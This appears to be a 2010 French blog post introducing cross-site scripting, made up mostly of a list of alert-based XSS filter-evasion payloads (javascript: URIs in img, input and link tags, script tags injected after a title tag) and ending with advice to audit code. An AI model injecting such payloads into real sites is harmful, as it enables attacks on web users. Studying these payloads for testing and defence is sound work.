Posts Tagged ‘Sécurite informatique’

XSS Paper :# !!

mardi, juin 15th, 2010

Bonjour,
Je vais vous présenter une attaque que je trouve si dangereuse et si répandue , il s’agit de XSS attaque .

Pour la déf , hé bin désolé de vous dire que vous pouvez googler le mot sinon voici quelques exemples des codes que je trouve sympa et intéressant de le savoir :

– Image XSS en utilisant un peu du JavaScript :

<IMG SRC= »javascript:alert(‘XSS’); »>

sinon

<IMG SRC=javascript:alert(‘XSS’)>

encore

<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

aussi

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

celle aussi j’adore ^^

<IMG «  » »><SCRIPT>alert(« XSS »)</SCRIPT> »>

– XSS en double ou simple cotes :

<SCRIPT>alert(/XSS/.source)</SCRIPT>

sinon

\ »;alert(‘XSS’);//

– Cella c’est in ze End Title Tag :

</TITLE><SCRIPT>alert(« XSS »);</SCRIPT>

– Avec un joli petit input :p :

<INPUT TYPE= »IMAGE » SRC= »javascript:alert(‘XSS’); »>

Aussi mes chers je peux vous dire qu’à travers l’appel du CSS Sheet on pourra exec du code JS tq :

<LINK REL= »stylesheet » HREF= »javascript:alert(‘XSS’); »>

ou plutot avec un remote style Sheet :

<LINK REL= »stylesheet » HREF= »http://xssxsxsxsxsxsx/xss.css »>

Woila woilou , donc faut jamais hésiter à inspecter son code pour éviter le pire ~_~)*